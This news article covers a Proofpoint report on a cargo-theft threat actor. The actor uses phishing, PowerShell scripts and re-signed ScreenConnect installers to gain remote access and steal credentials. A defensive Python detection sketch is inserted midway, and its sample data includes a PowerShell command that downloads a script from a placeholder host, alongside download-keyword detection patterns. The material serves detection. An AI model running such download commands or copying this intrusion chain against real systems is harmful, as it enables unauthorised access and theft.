
Freight Hacker Uses Code-Signing Service to Bypass Defenses


Prolific Threat Actor Focused on Using Malware to Facilitate Cargo Theft

In a landscape increasingly threatened by cybercriminal activities, a notable threat actor has emerged, posing significant challenges for the logistics and transportation sectors. Rather than employing traditional hijacking methods, such as armed robbery, these criminals have shifted their tactics to more sophisticated cyberattacks targeting transport and logistics firms. Cybersecurity experts from Proofpoint have reported that a prominent threat actor in this space is using malware to facilitate cargo theft, employing increasingly complex and stealthy techniques.

Research conducted by Proofpoint, published recently, outlines how this actor has developed new methods of installing remote monitoring and management (RMM) tools on victim systems. The goal behind these intrusions is clear: to gain unauthorized control over logistics operations, divert freight, and steal cargo. The stolen cargo is often resold online or smuggled overseas, potentially with the involvement of organized crime groups.

The team’s breakthrough came when they analyzed a malware sample inside a deception environment built with Deception Pro software. The environment was a convincing but synthetic replica of real systems, and the threat actor engaged with it as if it were a genuine victim. This allowed the researchers to track the intruder’s activity for more than a month, revealing a variety of new techniques used to exploit compromised environments.

Notably, the threat actor appeared to be a small group of individuals who deployed 13 different PowerShell scripts. These scripts served multiple malicious purposes, including enumerating local accounts, extracting browsing history, and collecting valuable data, with the results sent to attacker-controlled bots on Telegram. The scope of the operation was broad, targeting credentials for a range of financial and operational services, including banking, payments, logistics, and fleet management, which significantly heightens the risk of cargo theft and fraud.

Intent on retaining as many remote administration channels as possible, the attacker installed several types of RMM software on the decoy system, including SimpleHelp RMM, Pulseway RMM, and multiple instances of ConnectWise ScreenConnect. This redundancy shows the actor’s determination to maintain reliable access to compromised systems, consistent with financially motivated theft and fraud operations.

Intriguingly, the attacker’s initial focus while interacting with the decoy environment was not logistics-related. Instead, they prioritized searching for PayPal usage, bank account information, cryptocurrency wallets, and other forms of valuable data. Ole Villadsen, a staff threat researcher at Proofpoint, highlighted this tendency, noting that the actor’s interest extends beyond transportation to monetizing whatever is available on any compromised system.

The campaign orchestrated by this actor began on February 27, 2026, with a phishing attempt that included a malicious Visual Basic Script attachment. If executed, this script was designed to download and execute a secondary PowerShell payload while displaying a decoy broker-carrier agreement to mislead the victim into thinking everything was normal.

The secondary script was particularly sophisticated: it constructed a download URL for a ScreenConnect installer configured to connect to attacker-controlled infrastructure. That installer had been submitted to a third-party service for code signing. The service, previously unknown to researchers, re-signs ScreenConnect installers and components with a fraudulently obtained but valid code-signing certificate. Who operates the signing service remains unclear, but it is suspected to be shared within specific cybercrime circles.

Operating systems typically warn users about software signed with invalid or untrusted digital certificates. Here, however, the installer carried a valid signature and was launched by a script rather than by a user clicking on it, so the usual prompts were never shown. As a result, fewer alerts were raised and the intrusion proceeded without triggering common security warnings.
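As an added example, not from Proofpoint’s research or this article, the following Python detection sketch runs the points above over constructed, Sysmon-style process-creation events: a script host spawning a downloading PowerShell, RMM installers launched by PowerShell rather than by a user, a ScreenConnect binary validly signed by an unapproved publisher, and several RMM products landing on one host. Event field names, file paths, the sample command lines and the approved-signer placeholder are assumptions.

```python
from collections import defaultdict

# RMM products the article names; several on one host is the redundancy pattern the actor showed.
RMM_MARKERS = {"screenconnect": "ConnectWise ScreenConnect",
               "simplehelp": "SimpleHelp", "pulseway": "Pulseway"}
# Publisher your organisation approves on ScreenConnect binaries (placeholder; take it from a known-good install).
APPROVED_SC_SIGNER = "<approved ScreenConnect publisher>"
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

def classify(ev):
    """Findings for one process-creation event (field names are assumptions)."""
    findings = []
    parent, image = ev["parent_image"].lower(), ev["image"].lower()
    cmd = ev.get("command_line", "").lower()
    product = next((n for k, n in RMM_MARKERS.items() if k in image), None)
    # 1. A script host (the VBS attachment) spawning PowerShell that fetches content.
    if parent.endswith(("wscript.exe", "cscript.exe")) and image.endswith("powershell.exe") \
            and any(h in cmd for h in DOWNLOAD_HINTS):
        findings.append("script host -> PowerShell downloader")
    # 2. An RMM installer started by PowerShell rather than by an interactive user.
    if product and parent.endswith("powershell.exe"):
        findings.append(f"{product} installer launched from PowerShell")
    # 3. Validly signed, but by a publisher other than the one we approve.
    if product == "ConnectWise ScreenConnect" and ev.get("signed") \
            and ev.get("signer") != APPROVED_SC_SIGNER:
        findings.append(f"ScreenConnect signed by unexpected publisher: {ev['signer']}")
    return findings

def analyse(events):
    """Per-host findings, plus a note when more than one RMM product appears."""
    report, products = defaultdict(list), defaultdict(set)
    for ev in events:
        report[ev["host"]].extend(classify(ev))
        products[ev["host"]].update(n for k, n in RMM_MARKERS.items() if k in ev["image"].lower())
    for host, seen in products.items():
        if len(seen) > 1:
            report[host].append("multiple RMM products installed: " + ", ".join(sorted(seen)))
    return dict(report)

# Constructed sample events modelled on the chain described in the article.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent_image": r"C:\Windows\System32\wscript.exe", "image": PS,
     "command_line": "powershell -c iwr http://example.invalid/s -OutFile s.ps1"},
    {"host": "WS01", "parent_image": PS, "image": r"C:\Users\Public\ScreenConnect.ClientSetup.exe",
     "command_line": "ScreenConnect.ClientSetup.exe /quiet", "signed": True, "signer": "Constructed Signing Co."},
    {"host": "WS01", "parent_image": PS, "image": r"C:\Users\Public\SimpleHelp-setup.exe"},
    {"host": "WS02", "parent_image": r"C:\Windows\explorer.exe",  # benign: operator-installed, approved signer
     "image": r"C:\Temp\ScreenConnect.ClientSetup.exe", "signed": True, "signer": APPROVED_SC_SIGNER},
]
```

Calling `analyse(SAMPLE_EVENTS)` returns four findings for WS01 and none for WS02, the operator-installed, approved-signer case.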

The abuse of legitimate RMM tools like ScreenConnect is troubling, particularly given the tool’s popularity among attackers. As Villadsen noted, ScreenConnect has come to dominate the landscape, becoming a favored asset for cybercriminals looking to execute individual attacks efficiently. Certificate trust issues prompted the revocation of one of ScreenConnect’s signing certificates last June, which led the company to comprehensively redesign its architecture to mitigate future abuse.

Despite these advances in defending against direct installations of ScreenConnect, the emergence of signing-as-a-service lets attackers circumvent those controls, demonstrating their resilience in adapting to security measures. Villadsen pointed out the consistent operational tempo of this particular threat actor, contrasting its urgency with other actors whose activity is more sporadic.

Multiple threat actors continue to target logistics firms across North America and Europe, contributing to estimated global losses of $35 billion annually due to cargo theft. Other notable research has surfaced, revealing phishing platforms specifically developed for this sector, with one case resulting in over 1,600 stolen credentials. Villadsen confirmed that the closely monitored threat actor does not appear to overlap with these other phishing campaigns, highlighting the complex nature of the cyber threat landscape in the logistics industry.

In summary, the actions of this threat actor underscore the urgency of reinforcing cybersecurity measures within the transportation and logistics sectors. As attackers grow more adept at exploiting vulnerabilities, the need for heightened awareness and robust defense strategies becomes ever more critical.
